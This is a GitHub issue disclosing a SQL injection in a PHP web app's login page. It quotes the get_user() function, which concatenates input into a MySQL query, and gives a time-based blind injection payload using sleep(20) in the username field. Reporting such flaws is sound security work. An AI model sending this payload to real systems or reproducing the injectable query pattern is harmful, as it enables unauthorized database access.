Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Login page SQL injection #1

Open
shigophilo opened this issue Jun 10, 2021 · 0 comments
Open

Login page SQL injection #1

shigophilo opened this issue Jun 10, 2021 · 0 comments

Comments

@shigophilo
Copy link

Login page : login.php
judge : login_manager.php
function : get_user()

function.php Execute SQL query

	function get_user($where = ""){
		$koneksi = connection();
		$data = mysql_query("select * from userapp $where;") or die ("query error");
		destroy_connection($koneksi);
		return to_array($data);
username=admin'%2b(select*from(select(sleep(20)))a)%2b'&password=admin
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant